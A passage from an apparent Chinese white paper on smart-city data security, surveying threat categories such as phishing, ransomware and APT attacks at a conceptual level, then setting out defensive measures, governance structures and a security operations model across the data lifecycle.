理机制,内部管理不规范,导致数据安全面临严重挑战。 根据 Verizon 发布的《2022 年数据泄露调查报告》,2022 年数据泄露事 件中 82%的违规行为涉及人为因素。因此,数据运营过程也是数据安全防护 不容忽视的方面。比较典型的风险:一是内部员工出于个人利益,越权访问、 恶意篡改或窃取重要敏感数据;二是运维人员因误操作或者泄愤行为,造成 数据损坏;三是企业因培训不足、管理流程不规范等原因导致员工误用、滥 用数据;四是因系统故障、设备老化等原因导致数据意外丢失。 (二)智慧城市数据安全外部攻击风险 智慧城市建设中涉及的数据具有种类多、覆盖范围广、总量大、数据价 值高等特点。随着数据价值重视程度的提升和信息化的发展,重要数据成为 更多不法分子的目标。近几年国内外数据安全事件呈上升趋势,事件原因多 种多样,后果日益严重,智慧城市建设中面临的外部安全威胁越来越严峻。 从全球公开新闻报道[5]来看,51.7%的数据安全事件为数据泄露事件,23.3% 的数据安全事件为数据破坏事件。下面重点就造成数据泄露、数据破坏的主 要攻击手段以及新的攻击技术带来的安全风险进行分析。 1. 常用攻击手段 (1)凭证窃取 智慧城市有力推动了区域或行业信息基础设施的集约化发展,这种集约 化基础资源的高度共享性,加大了数据 IP、身份窃取等安全风险。根据 Verizon 《2022 年数据泄露调查报告》显示,凭证窃取是造成数据泄露的重要因素之 一。外部攻击者常常使用密码喷射、凭证填补、 中间机器等攻击向量窃取凭 证,以直接获取的姿态盗取数据。 (2)网络钓鱼 网络钓鱼是攻击者利用欺骗性的电子邮件和伪造的web 站点来进行诈骗 活动。智慧城市建设涵盖众多行业,电力、交通、医疗等领域,涉及大量敏 感信息,一旦数据管理人员安全意识不足或者操作不当,被黑客组织利用, 对城市建设造成的损害难以估量。根据《2022 年数据泄露成本报告》显示, 网络钓鱼是第二大造成数据泄露的原因,同时也是造成组织损失金额排名第 一的攻击方式,平均给受访组织造成高达 491 万美元的损失。 (3)供应链攻击 供应链攻击是一种面向软件开发人员和供应商的新兴威胁。攻击者会将 供应链作为攻击对象,先攻击供应链中安全防护相对薄弱的企业或组织,再 利用供应链之间的相互连接,如软件供应、开源应用等,将风险扩大至上下 游企业或组织,产生巨大的破坏性。智慧城市中供应链涉及环节复杂,链路 长而广泛,供应商众多,暴露给攻击者的攻击面也越来越多,供应链的各个 环节都可能成为不法组织攻击的入口。根据《2022 年数据泄露调查报告》显 示,今年 62%的系统入侵事件是由供应链造成的。 (4)漏洞利用 漏洞利用是造成数据泄露的另一个主要原因之一。漏洞利用作为攻击常 用的手段,更是有着目标行业化、手段多样化的趋势。新的安全漏洞(如 0day、 已发现而不公开的高危漏洞等)作为具备强大威慑力的新型网络武器,备受 业界关注。一是攻击者通过安全漏洞攻破网络“大门 ”、横向移动传播、获 取控制权、破坏或窃取数据形成完整网络攻击组合拳;二是漏洞修复不完善 引发“次生灾害 ”,历史漏洞重复利用或修复后再突破,这些新的漏洞层出 不穷,传统漏洞被持续利用的情况,让智慧城市在建设过程中面临着严峻的 安全威胁。 (5)僵尸网络 僵尸网络是指采用一种或多种传播手段,将大量主机感染僵尸程序病毒, 从而在控制着和被感染主机之间所形成的一个可一对多控制的网络[6] 。物联 网是智慧城市建设的技术基础,然而物联网设备是僵尸网络的理想设备,因 为它们的安全性较差,并且还存在大量几乎相同的设备,攻击者可以使用同 样的策略进行攻击,造成网络瘫痪,从而窃取内部重要数据或导致大量隐私 泄露。 2. 数据破坏途径 (1)通过勒索软件破坏数据 勒索软件是数据遭到破坏最主要的原因。近年来,对数据强行加密的勒 索手段成为攻击者最常用且最有效的攻击手段,勒索攻击目的由单纯经济牟 利转向实施数据破坏、窃取战略机密、谋取政治诉求等多重企图。一是关键 信息基础设施已经成为黑客发起勒索攻击的重点目标。二是随着技术的发展, 黑客组织的勒索手段由单一加密勒索转向双重勒索、多重混合勒索模式,以 “勒索 ”为幌子,掩护其进行数据破坏、情报猎取等真实意图,获取更多潜 在利益。 目前,智慧城市建设的各个领域,包括应急服务、交通、能源等, 正越来越多的与 5G 物联网服务和传感器相连。此类物联网设备的任何安全缺 失,都可能使它们成为黑客组织运用勒索软件攻击的目标。 3. 其他攻击方法 (1)APT 高级持续性攻击 APT 攻击(高级可持续威胁攻击),也称为定向威胁攻击,指某组织对 特定对象展开的持续有效的攻击活动。APT 组织攻击领域广泛,规模庞大; 攻击目标多样,全域覆盖;攻击技术先进,手法复杂,攻击具有极强的隐蔽 性和针对性。智慧城市数据对政治、经济和社会等方面高价值的特点,往往 成为 APT 组织攻击的主要对象。APT 攻击以获取机密数据、控制关键基础设 施运行等为目标,一旦发生将给人民生产生活、社会经济稳定,甚至国家安 全造成巨大影响。 (2)利用爬虫技术非法获取敏感数据 大数据时代的到来,使得网络爬虫技术得以广泛应用。在智慧城市数据 收集过程中,也会经常用到网络爬虫技术,将网络中出现的实时数据进行快 速抓取。但随着爬虫技术的发展,不法组织利用其技术非法爬取大量行业数 据,从数据中分析出行业网络行为特性、甚至具有高价值的敏感数据,以谋 取非法利益或获取商业对手核心机密等。 (三)智慧城市数据交换开放共享风险 智慧城市的建设和运转需要将大量的数据进行共享,更开放的数据会带 来更便捷的城市服务。但是在无可信第三方的情况下,共享的数据同时也会 带来相应的风险,主要存在于三个方面。 一是数据的完整性风险,数据共享过程中,数据的创建、处理、传输被 未授权的方进行篡改,数据的完整性遭到破坏,影响数据的真实和准确,进 而影响到以来这些数据的智慧城市的运营与决策;二是数据的保密性风险, 参与数据共享的信息应是保密的,相较于传统的数字加密传输,智慧城市中 共享的数据量规模更大,计算频次更高。多方数据参与的场景下,给数据保 密带来了新的挑战,数据的归属方信息在参与数据共享的过程中,未被妥善 处理的身份、位置等关键信息会被其他数据共享方获取。此类被泄露的数据 会被用于追踪或识别特定的组织或个人,挖掘出更多的参与方信息;三是数 据的可用性风险,数据共享会对授权用户访问产生影响,参与数据共享的信 息原则上应以最小使用范围为准,但智慧城市数据庞大,一次数据的计算会 涉及到多个业务,数据在传输和存储中不合理的访问控制,会带来数据不可 用的风险。 (四)智慧城市新技术应用带来的风险 智慧城市的建设离不开新技术的支持,而新技术在为智慧城市建设带来 发展机遇的同时,也带来了新的安全风险。6G 、人工智能、数字孪生等技术 的发展,催生出很多新型、高级的网络攻击手段,使得传统的安全防御技术 无法有效抵御外界的风险。 随着 6G 技术的研发和应用,将打通未来智慧城市的各个领域,包括政务、 能源、交通、医疗等行业,实现全域覆盖、通感一体、智慧交互,让我们的 城市更联通和智能。但是 6G 技术带来便利的同时,也为个人隐私数据带来更 多的威胁。相比 5G 网络,6G 网络中会具备更多的数据形式,如传输大量人 体数字信息(包含物联网、电子健康、人体局域网等)。此外,6G 网络将会 更广泛地渗透到各行业,网络中的大量数据将会包含及其敏感的个人隐私。 如果没有强有力的隐私保护手段,极可能面临数据泄露风险。与此同时,6G 网络带来的空天地一体化网络环境十分复杂, 由于具有时延长、误码率高、 信息非对称、高动态特性等特征,以及承载的业务类型具有多样性,给数据 可靠传输带来巨大挑战,同时数据泄露也变得日益严重, 由此引发的问题往 往会直接关系国家安全。 人工智能技术,可以通过自动化决策在人脸识别技术、智能医疗、智能 交通、智能家居等诸多领域发挥作用,但是它也能被不法分子用于网络诈骗、 黑客攻击、生物信息伪造等方面,例如业余黑客利用 ChatGPT 开发智能恶意 软件程序并发起隐形攻击,使得攻击更加隐蔽、智能、有效,导致数据被操 纵、暴露和篡改的风险不断放大,从而给智慧城市的建设带来新的安全风险。 数字孪生技术的发展,能够极大推动智慧城市建设,如建立实时标准的 结构化数据,提高定位的精准性;通过对城市交通数据进行实时分析,可精 准预测城市交通拥堵的关键节点,进而提前进行交通管制,缓解交通压力。 但是,数字孪生技术会产生海量数据,需要多种存储方式进行存储,每个环 节都可能会产生数据泄密的风险,同时虚拟控制系统也可能存在各种未知安 全漏洞,造成数据泄露。 新技术的发展使得数据安全攻击更加智能化,攻击手段更加隐蔽和持续, 导致许多传统的安全防护体系无法应对新问题,数据安全所面临的风险也在 不断增加。 三、 智慧城市数据安全需求 (一)国家法律法规合规需求 1. 满足国家智慧城市数据安全的顶层设计 顶层设计是智慧城市数据安全建设的行动指南,是检验智慧城市数据安 全成果的工具,是实现安全合规的基础。 从整体来看,全国对智慧城市数据安全越来越重视,但针对智慧城市数 据安全领域的制度体系尚不完善,结构内容尚不丰富。针对上述难点,应在 管理方案、技术防护、运营机制三方面做好顶层设计,推进智慧城市数据安 全体系规范化建设。管理方案层面,需明确安全主体责任,完善智慧城市数 据访问权限控制、安全风险处置、安全审计等数据安全管理制度规范,加强 数据流转全流程审计监督,形成组织架构、制度规范、合规审计三位一体的 闭环管理方案;技术防护层面,根据智慧城市数据特点,利用数据加密、数 据脱敏等基础防护手段,结合隐私计算、人工智能等新技术,完善数据安全 防护和监测手段,实现数据处理周期的可见、可知、可管、可控;运营机制 层面,加强安全服务能力集中化运营、安全服务团队统一管理,加强数据安 全风险信息的获取、分析、研判、预警以及应急响应处置机制,建立健全事 前管审批、事中全留痕、事后可追溯的数据安全运营机制。 2. 不断细化完善安全技术规范 智慧城市数据安全面临管理工作体系化、标准化、规范化程度不高,安 全管理制度未能充分落地,安全责任难以清晰界定,部分人员数据安全意识 不强,数据安全工作统筹协调难度大等难题。针对此情况,我们研究相关政 策,总结出在智慧城市数据安全领域应不断细化完善安全管理和技术规范, 一是组织架构方面,从决策层、管理层、支持层、监督层健全智慧城市数据 安全组织架构,明确安全职责分工和监督责任;二是制度规范方面,落实国 家《数据安全法》、《网络安全法》、《个人信息保护法》等法律法规要求, 加强智慧城市数据安全总体规划、指引或规范等的制定,完善数据安全分类 分级保护、风险评估、检测认证等管理制度、技术规范和实施细则,建立处 理周期的数据安全管理制度和数据安全工作责任制度;三是合规审计方面, 建设“高位监管咨询- 中位常态监测-低位检查评估 ”三位一体的数据安全监管 审计体系,保障智慧城市数据安全系统的稳定运行。 (二)智慧城市数据安全运营管理需求 针对智慧城市数据安全领域缺乏专业化数据安全运营管理机制,内部管 理不规范等风险,智慧城市在数据安全运营方面应不断加强完善日常运维、 安全监测、应急处置、安全检查与审计、常态化攻防演练等能力,建立持续 化、一体化的安全运营机制,实现对数据资产、安全策略、安全风险和安全 事件的统一运营管理,对风险事件的日常监测、主动防御。 日常运维方面,需建立数据安全运维团队,各个业务系统对接数据安全 运营平台,同步数据安全的监测数据,实现智慧城市数据安全协同。 安全监测方面,需建设数据安全态势感知平台,完善威胁监测响应能力 建设,强化数据和应用访问过程中异常行为和数据泄露的风险监测,充分整 合各方安全监管能力,形成数据安全攻防态势统一感知和协同处置工作机制, 强化日常监测、通报预警和协同联动能力。 应急处置方面,需完善智慧城市数据安全应急预案,强化应急处置能力, 完善集安全事件发现、应急响应与处置恢复为一体的快速应急响应联动机制。 安全检查、安全审计方面,建立常态化的安全检查工作机制,并根据数 据安全检查情况及时进行整改和加固提升,健全数据安全审计机制。 攻防演练方面,通过常态化的攻防演练排查各业务系统的数据安全风险, 充分利用攻防演练成果,完成相关问题整改,强化数据安全防护能力。 (三)智慧城市数据安全技术体系需求 智慧城市数据量大、种类多、流动性和传播性强,所蕴含的巨大价值使 其极易成为攻击的重点目标,在数据处理各环节均伴随各类安全风险,特别 是涉及重要或核心数据的泄露与破坏,将影响国家安全和社会稳定。传统的、 单一的安全防护技术缺乏协调联动能力,无法形成安全协同,难以应对智慧 城市面临的安全威胁。因此,从数据处理安全技术出发需建立全方位、一体 化的数据安全治理技术体系,实现面向数据处理周期的事前预防、事中监测、 事后审计的动态安全防护能力。 一方面需要不断完善和建设数据分类分级、数据脱敏、数据加密、数据 销毁等基础防护技术,加强隐私计算、数据流转分析等关键技术来保障智慧 城市数据处理安全;另一方面,需建设安全策略防火墙、IPS、WAF、抗 DDoS、 邮件网关等网络防护技术,来有效应对恶意代码、爬虫、DDoS 攻击、钓鱼邮 件、APT 攻击等外部网络攻击。最后为提高自主可控性,在安全防护技术中 应减少对外部软件和技术的依赖,提高技术的自主可控性。 (四)智慧城市新技术应用的安全需求 近年来,新技术的快速兴起,在促进智慧城市发展的同时也带来了新的 安全问题。如何运用新兴技术为智慧城市数据安全保驾护航, 已经成为未来 智慧城市建设的重中之重。本文从加密技术、人工智能技术两方面举例说明 智慧城市数据安全领域对新技术发展的需求。 数据加密技术是智慧城市数据安全的核心技术之一,对保障智慧城市各 领域数据的机密性、完整性发挥着重要作用。因此,需要建设可以抵抗量子 计算攻击的新型密码体系。一是要探索量子安全技术网络总体架构、网络控 制、密钥分发管控、小型化、移动化等关键技术,推动网络建设验证与关键 技术应用;二是探索基于后量子密码算法协议、无线网络环境中量子密钥传 输技术,拓展量子密钥在 5G 、云、物联网、大数据等业务场景及移动网络环 境中的应用,推动量子密码技术向多行业领域的融合创新应用;三是加强抗 量子密码算法的研究,提高密码算法在各类数据加密场景和身份认证场景中 的抗攻击性,更好解决量子技术发展带来的新型安全问题。 近年来,人工智能相关技术不断发展,正在加快与智慧城市各个行业的 深度融合。虽然人工智能提高了智慧城市建设和管理的规范化、精准化和智 能化水平,但是它也面临着投毒攻击、对抗攻击等特有攻击,加大了智慧城 市数据安全性方面的挑战。一方面要推进人工智能可信安全技术的研究,使 AI 技术与业务充分融合;另一方面要加大与隐私计算、区块链等技术的融合, 确保数据流转、共享过程中的安全性。 四、 智慧城市数据安全解决方案 (一)智慧城市数据安全总体架构 智慧城市数据安全总体架构的目标就是要保证城市在数字化转型过程中 各类数据基础设施和重要业务系统的正常运行,确保智慧城市重要数据资源 的保密性、完整性、可用性、真实性、可控性、不可抵赖性,使个人信息得 到保护,满足国家对新型智慧城市数据安全保障工作的要求。 图 3 智慧城市数据安全总体架构 (二)智慧城市数据处理周期安全 智慧城市数据处理周期整体是一个系统性的安全保护措施,要通过技术 手段和管理规范相结合来实现对智慧城市数据的有效保障。它具体分为七个 阶段,分别为数据收集安全、数据存储安全、数据使用加工安全、数据传出 安全、数据提供安全、数据公开安全和数据销毁安全,每个阶段具有特定的 保护方案。 1. 数据收集安全 (1)资产发现方案 智慧城市大数据平台通过资产扫描、元数据接口对接、数据字典导入等 方式,收集、发现各对接系统的数据资产,其中资产扫描方式是以任务形式 对指定城市平台内的各类数据库、涉敏文件进行嗅探, 自动发现数据资产并 进行备案,再通过对指定数据库、大数据或文件进行扫描,识别数据资产与 分类分级情况;数据字典可通过文件导入或与元数据系统的接口对接方式获 取数据资产。 智慧城市大数据平台通过主动发起数据探测行为,对数据源或结构化文 件、非结构化文件中的数据进行分析,运用字段名、字段描述、内容关键字、 正则表达式、 自然语言识别等规则匹配,进行数据特征的智能识别,该技术 可以判断输入数据的特征是属于个人姓名、身份证号、手机/座机号、职业、 地址、纳税人识别号等类型。通过数据资产自动发现与识别技术,可以对需 要分类分级的数据做预处理,加速人工判别过程。实现数据资产的全面测绘, 形成数据资产地图、多维统计分析视图、资产分析报告、数据清单等。 (2)分类分级方案 智慧城市大数据平台对发现的数据资产,面向字段名、字段描述、数据 样本三要素,通过数据识别引擎进行自动化的敏感数据特征识别,与数据分 类分级模板中明细分类建立映射关系,快速生成数据分类分级策略,完成数 据资产分类分级的预处理。 数据分类分级模板依照智慧城市特点,对经济、证券、工控、政务等行 业标准制定不同预制模板。参考标准如《数字化改革 公共数据分类分级指南》 (DB33/T 2350-2021)、《国民经济行业分类》(GB/T 4754-2017)、《政务 信息资源目录体系 第 4 部分:政务信息资源分类》(GB/T 21063.4—2007)、 《证券期货业数据分类分级指引》(JR/T 0158—2018)、《石油和化工行业 工业数据分类分级指南》等。 智慧城市大数据平台针对数据字段和字段描述,通过运用谓词切分与语 义分析技术,帮助了解和定义数据的业务分类,进一步通过表和字段自动关 联分析,对业务分类关键字进行钻取、分析、统计,帮助对业务分类进行统 计确认,并与数据分类分级模板中的明细分类建立映射关系,生成更加精确 的数据分类分级策略。 城市大脑基于已分类分级的数据资产结果集,将结果中的表名、字段名、 字段描述、数据特征等作为向量,进行机器学习建模,并根据知识库模型智 能预测大规模数据的分类分级打标,实现数据自动分类分级,输出数据分类 分级报告。并通过面向行业或系统的持续模型优化,形成数据分类分级模型 知识库, 向全自动数据分类分级迈进。数据分类分级结果根据数据重要性, 在数据处理周期各环节采取不同保护策略和要求。 2. 数据存储安全 (1)静态脱敏方案 数据脱敏是指对某些敏感信息通过脱敏规则进行数据的变形,实现敏感 数据的可靠保护,实现在不泄露用户隐私的前提下保障业务系统的正常运行, 对敏感数据去标签化处理。脱敏算法包含掩码、截断和哈希,脱敏技术应支 持通过灵活多样的内置或自定义脱敏算法,实现了智慧城市各类数据的不同 脱敏效果,并确保脱敏后的数据保真可用。 (2)静态加密方案 智慧城市中存在用户身份证号、手机号码、家庭地址等大量敏感数据, 面临内部非授权访问泄露、外部黑客攻击拖库等威胁,一旦泄露将对城市安 全产生较大挑战。通过使用加密技术,将敏感数据加密保护,对抗数据明文 泄露威胁。静态加密技术应包括密钥管理技术、专属加密技术、数据静态加 密技术。 智慧城市各系统之间需统一密钥方使得各加密数据一致,密钥管理技术 (KMS)帮助智慧城市各系统平台统一管理密钥、敏感数据加密、数据数字 签名等,支持智慧城市管理人员创建、启用、禁用、删除、导入密钥;支持 密钥轮询、密钥授权。 数据静态加密方案 ,一般支持对称: SM1/SM4/AES/SM7 、非对称: SM2/RSA(1024~4096) 、摘要:SM3/SHA256/SHA384 等加密算法。可以对城 市中原始数据进行加密工作,保证在城市数据存储中(数据库、HIVE 表、HDFS 等)数据处于加密状态,并可根据数据保密需求的不同,设置不同的加密算 法。加密技术需拥有独享加密芯片支持 SM1 、SM2 、SM3 、SM4 等国产加密 算法。 图 4 数据存储加密技术 3. 数据使用加工安全 (1)操作审计方案 针对智慧城市数据使用场景过多、数据使用频繁的情况,审计系统一般 采用分布式轻量插件的方式实现旁路部署。通过在宿主机上部署网络探针 (RMAgent) ,对数据操作进行全面审计,通过在服务器中部署数据插件 (DBLAP),实现运维人员本地数据库操作审计,从而实现全方位数据库审 计。并且 Agent 和 DBLap 通过智能动态防御机制,在数据库主机处于高耗能 情况下,释放资源保障数据库业务的正常运行。对数据使用、数据库登录等 操作行为建立日志, 日志的内容包括但不限于:时间、IP 地址、用户 ID 、操 作内容、操作对象等,对操作异常行为进行识别分析并及时督促整改。 (2)访问控制方案 访问控制主要保护数据通过应用程序和 API 访问,以及用户终端使用过 程中的数据泄露防护。基于用户级别和数据级别,配置数据访问权限策略, 对于高敏感级数据采用双人控制等访问控制策略。 4. 数据传输安全 (1)传输加密方案 智慧城市数据传输通过安全基础设施提供的加密网关等数据加密保护功 能,对传输协议、链路进行加密,保障传输安全;通过安全基础设施提供的 密码服务等数据加密保护功能,对数据进行签名和验签,防止身份抵赖。常 用技术包括 SSL 算法、VPN 隧道、安全网关等。 (2)传输监控方案 全流量采集监测分析技术,其传输监控的位点包括了智慧城市各平台间 传输的网络监控,智慧城市平台内部数据操作的应用监控,客户访问智慧城 市的接口监控等。将监控的所有节点实时上传至监控统一平台,平台系统监 测节点状态、业务流向;对分析发现的可疑威胁源与高风险事件,进行持续 跟踪分析,并结合历史告警事件进行关联分析,从而挖掘出隐藏的真正威胁。 网络监控技术具有仿冒检测能力,持续检测数据采集设备运行状态,当 发现设备存在网络环境变更(如网络中断重新接入),或网络行为出现变更 时触发仿冒确认过程。当发现设备硬件信息(MAC 地址)、指纹信息发生变 化时,确认设备仿冒事件发生。当确认设备发生仿冒,准入系统需要通过连 接重置的方式对设备网络流量进行限制或联动网络设备的方式直接切断设备 网络连接。同时记录完整的发现及处置日志,满足合规审计要求。网络监控 同时搭配 IPS 安全设备,可对网络攻击如 DDoS、暴力破解、漏洞利用等进行 监控与拦截。 应用监控技术具备内部数据调用检测能力,持续监测各数据库内部数据 调用的合法正规性,当发现数据库被大量或恶意调用,将自动阻断并进行告 警通知。 接口监控技术具备对智慧城市全部流量采集汇聚,搭配流量审计系统可 对用户访问的所有行为检测建模。通过与防火墙等网关设备联动,对非法身 份、恶意攻击、可疑操作等问题进行拦截并告警。 5. 数据提供安全 (1)动态脱敏方案 动态数据脱敏旨在通过类似网络代理的中间件技术,按照脱敏规则对于 外部申请提供的数据进行及时处理并返回脱敏后结果。动态脱敏通常会在数 据对外提供服务的场景中使用。 智慧城市大数据平台应可设置动态脱敏规则,针对不同的访问身份,动 态遮蔽查询返回的高级别数据内容,防止智慧城市核心数据通过水滴式收集 和屏幕拍摄的方式大量泄露。如针对智慧城市对市民服务的业务,应区分调 用数据的账号,当存在普通市民帐号请求数据时,应动态配置脱敏方案,防 止他人信息泄露。 (2)对外接口管控 数据对外接口管控通过对网络协议解析,建立 API 接口清单并识别敏感 数据暴露面,避免出现安全管理盲区,降低数据泄露和合规风险。围绕业务 API 接口,采用实时监测技术,对 API 接口数据进行协议解析,对接口数据 流转环节进行风险关联分析,实现敏感数据传输与违规监测、异常行为风险 监测,以确保日常数据处理活动的安全、合规。数据对外接口管控主要包括 API 应用接口地图绘制、行为异常监测、数据内容合规监测等功能。 6. 数据公开安全 (1)数字水印方案 智慧城市数据水印是指从原始环境向目标环境进行敏感数据公开时,通 过向数据中植入水印标记,使数据具有可识别分发者、分发对象、分发时间、 分发目的等因素,同时保留目标环境业务所需的数据特性或内容的数据处理 过程。数据水印应具有隐蔽性、可追溯性、确定性等特点。 这项技术主要用于在智慧城市数据公开中的事后追责活动:通过对已经 发生数据安全损害事件中的特定行为成因进行探究,从导致结果的成因中找 出权重最大或最初始阶段的行为主体,再以规章为依据追究其相关责任。相 关数据安全事件既可以是数据泄露,也可以是数据被滥用或者盗版、贩卖等 情况。 (2)文档标签方案 智慧城市中存在大量的文档文件,对于指定用户或用户组终端中标注为 指定密级的文件,在打印时自动加标水印。水印可以通过普通水印或二维码 等方式实现,支持水印的打印位置、透明度等参数的灵活设置, 同时也支持 记录、追踪指定密级文件的打印行为。 7. 数据销毁安全 (1)数据销毁方案 数据销毁实现在停止智慧城市业务服务、数据使用以及存储空间再分配 的场景下,对数据库、服务器以及终端中的数据、文件、帐号等信息进行擦 除或者物理销毁。核心安全能力要具备介质销毁、数据销毁以及销毁过程审 计等安全能力。 (2)密钥销毁方案 当智慧城市业务服务停止、数据加密算法停用或密钥过期时,应通过 KMS 密钥管理系统对已有密钥进行销毁。密钥销毁时为防止密钥泄露造成从前加 密的信息被破译,要及时销毁已不再使用的密钥。正常销毁时,需将密钥和 密钥备份的所有信息清除,清除的方法可以是数字方式的,也可以是物理方 式的,关键在于使任何人无法以任何方式重新获得这一密钥的任何信息。 (三)智慧城市数据安全管理 针对当前智慧城市开展数据安全治理面临的主要风险和关键需求分析, 本白皮书面向智慧城市,从组织架构、制度建设、监管实施三个方面,持续 探索和演进适合我国、易于落地的智慧城市数据管理方案。 1. 智慧城市数据安全组织架构 智慧城市负责数据安全治理例行事宜的通常是一个常设团队,一般称为 数据安全治理委员会或安全管理小组。团队的职责是制定对数据进行分类、 分级、保护、使用和管理的原则、策略和过程,维护运营日常数据安全相关 事宜。团队的成员应包括城市运营机构内的安全专家,以及所有与数据安全 有关部门(如 IT 支持、法律、运营和维护、城市数据管理局、外部平台负责 人等)的人员代表;在一些大型的智慧城市建设中,因为数据安全正日益变 成国家安全的重要问题,甚至会包括城市管理决策一把手(市领导)担任主 要负责人。 图 5 数据安全组织架构 数据安全治理团队常用的组织架构架构如图 5 所示, 自顶而下依次为决 策层、管理层、支持层,外加一个贯穿数据安全治理全程并负责对上述三层 进行监督审计的监督层。各层的职能分工和成员建议如下: (1)决策层 负责对智慧城市体系开展和实施数据安全治理的体系目标、范围、策略 等进行决策。决策层成员包括智慧城市管理最高负责人(如该城市管理范围 的第一领导)和信息安全方面的最高负责人(如主管信息化的委办局第一领 导等), 同时可以考虑由负责智慧城市建设的设计单位负责人以及对接各平 台的负责人负责决策层的例行工作。 (2)管理层 管理层一般由来自专门的数据管理部门人员组成,负责数据安全治理体 系的建设、培训和运营维护工作。在智慧城市启动建设的早期,管理层需要 牵头对各组织现有的数据资产进行梳理, 向业务运营、数据分析等数据使用 部门充分了解与数据安全有关的业务需求,分析评估安全威胁和潜在风险, 并详尽调研各政策、法律、标准、规范中的数据安全合规要求,然后根据智 慧城市的风险承受能力和财务预算,规划和起草适宜自身的数据安全操作规 程等制度文档。在制度规范得到决策层认可后,管理层要组织相关培训,以 推动制度在智慧城市各平台内的推广和落地实施。管理层还要承担起维护数 据安全制度持续运转的保障工作,并及时做出更新、调整和优化,以更好适 应和支撑智慧城市持续发展。 (3)支持层 支持层一般由来自业务平台和运维部门的人员组成。这些人员是数据的 使用者、管理者、维护者、分发者, 同时也是数据安全策略、规范和流程的 重要执行者和管理对象。在智慧城市数据安全治理启动建设的早期,支持层 负责协助管理层详细了解并深入理解智慧城市在使用过程中的各种数据安全 需求;对管理层提出的数据安全操作规程等制度和方案的可行性和易用性, 进行细致的分析和评估,并将结果反馈给决策层,以支撑后者做出明智、正 确的决策。数据安全制度正式发布实施后,支持层要在其日常例行工作中严 格遵守数据安全操作规程,并积极发现和报告制度规范中的漏洞和潜在风险, 促进管理层及时响应,尽快对数据安全的制度和措施做出更新、调整和优化。 智慧城市的供应商也应按照支持层相关要求制度进行合规工作。 (4)监督层 监督层一般由智慧城市的审计部门承担,负责定期对数据安全方面的制 度、策略、规范等的贯彻落实和执行遵守情况进行考查与审核,并将结果汇 报给决策层。监督层的关键是要具有独立性,确保其审计核查工作不会受到 来自其他三层,特别是管理层和支持层的相关利益或动机的影响和干扰,从 而保证智慧城市能够及时发觉其数据安全制度在落地执行层面的问题和风险。 提供重要用户个人信息、城市用户数量巨大、业务类型复杂的个人信息处理 者,还需成立主要由外部成员组成的独立机构对智慧城市数据保护情况进行 监督。 2. 智慧城市数据安全管理制度 以总体国家安全观的全局视角,强化安全意识,树立底线思维,明确安 全主体责任,遵循国家法律法规、政策文件及标准规范、确保安全资源投入、 加强与业务条线和监管部门的协同与合作等方面进行数字政府安全保障体系 顶层设计、建立数字政府安全管理制度、政策和标准化体系,以指导和约束 数字政府的安全管理、技术建设活动。 图 6 数据安全管理制度 智慧城市数据安全管理体系可分为四层架构,每一层作为上一层的支撑。 第一层是管理总纲,是智慧城市组织数据安全治理的战略导向。应明确组织 数据安全治理的目标重点,如“ 以国家法规为基础,以保障国家安全为目的, 管理与技术并重 ”的数据安全治理方针;第二层是管理制度,是数据安全治 理体系建设导向。应建立智慧城市相关的具体制度,如城市运营责任要求、 数据安全管理制度、组织人员与岗位职责、应急响应、监测预警、合规评估、 检查评价、教育培训等;第三层是操作流程和规范性文件,是组织安全规范 导向,是智慧城市建设和运营期间的具体规范指导。作为制度要求下指导数 据安全策略落地的指南。应建立城市数据分类分级操作指南、技术防护操作 规范、数据安全审计规范、合规评估、监测预警响应流程、运营运维流程等 指导性文件。指导性文件应详细指导操作人员每一步工作具体流程命令与要 求;第四层是表单文件,是组织安全执行记录。作为数据安全落地运营过程 中产生的执行文件。应建立城市数据资产管理台账清单、数据使用申请审批 表、安全审计记录表、账号权限配置记录表等。 3. 智慧城市数据安全合规审计 针对智慧城市数据管理特点,建设“高位监测咨询- 中位常态监管-低位检 查评估 ”三位一体的数据安全监管审计体系,开展常态化监测分析服务,提 升智慧城市数据安全监管能力,构建具备实时监测、精准定位、高效管理能 力的数据安全风险监测、异常追溯与综合治理的审计体系。 图 7 数据安全合规审计 高位监管咨询:结合智慧城市实际情况,优化安全管理制度体系,明确 各部门安全管理职责,明确相关安全标准及管控要求,使安全审计工作有据 可依、责任到人。结合国家在宏观安全态势、政策法规要求、威胁情报、安 全指引等方面的优势,围绕监管职能为开展监测审计,全面挖掘智慧城市数 据安全风险态势并对风险集中管控。 中位常态监测:建设数据安全数据安全监管平台,在数据平台边界部署 流量采集探针,利用流量分析手段,实现对流量侧个人信息和城市重要数据 的识别发现,对数据发布、使用和开放共享、跨境传输过程中数据泄露风险 进行主动主动和识别,并开展安全事件关联溯源及综合分析。 低位检查评估:对标智慧城市安全管理制度检查要点、相关法律法规要 求、涉及行业安全要求等方面,从各安全维度建立自评估体系,定期人工审 计,提前识别和处置相应风险及问题点,并提供整改建议。对于高、 中位能 力发现的数据安全漏洞及事件告警,通过安全专家介入,对事件开展实地分 析研判,支撑取证溯源,协调技术处置,持续对平台数据安全监测模型、监 管策略等的优化调整。 (四)智慧城市数据安全运营 1. 智慧城市数据安全运营中心 智慧城市安全运营中心是联动市、区县网络安全工作的总枢纽、是市域 各单位获取安全能力的总资源池、是市域一体化安全运营的总工作站。一是 统筹安全服务能力。让安全能力集约化、服务化、SaaS (Software as a Service) 化,形成本地化安全资源与服务目录。对全市单位进行开放,各单位可以自 主化、定制化使用安全资源能力;二是统筹安全服务团队。整合市场上优秀 的数据安全产品与优秀厂商的安全服务,将不同服务商提供的碎片化的安全 服务整合成“城市主导、联合运营 ”的一体化安全运营服务机制。各厂商安 全服务成员统一纳入安全运营中心统一服务团队,将生态服务商整合成一个 有机整体,达到持续优化、动态运营的效果;三是统一安全运营服务机制, 建立安全运营服务规范与标准化流程。各服务商团队采用同一个标准参与、 同一个标准考核、同一套流程开展服务,共同维护智慧城市数据安全; 四是 统一数据安全策略管理,以数据为中心来制定安全策略,以分类分级结果为 基础,通过安全策略管理中心下发对应策略实行不同级别的数据安全防护。 数据安全策略包括敏感数据发现策略、脱敏策略、加密策略、水印策略、访 问控制策略等。 数据安全运营中心包括态势感知、威胁情报、资产管理、数据地图、统 一分析、联合处置、集中审计、安全检测、7*24 值守、事件展示大屏等功能。 安全运营中心落地建设完成后,将不断升级智慧化分析能力,实现人机协同 网络安全分析和防御的先进能力,同时以动态化的方式对智慧城市相关安全 体系实现监督管理。 2. 智慧城市数据安全应急响应 通过数据安全处理周期安全防护,强化日常数据安全运营工作,不断完 善数据安全管理体系,智慧城市应通过安全应急响应工作对安全问题进行闭 环。安全应急响应流程分为准备阶段、检测阶段、抑制阶段、根除阶段、恢 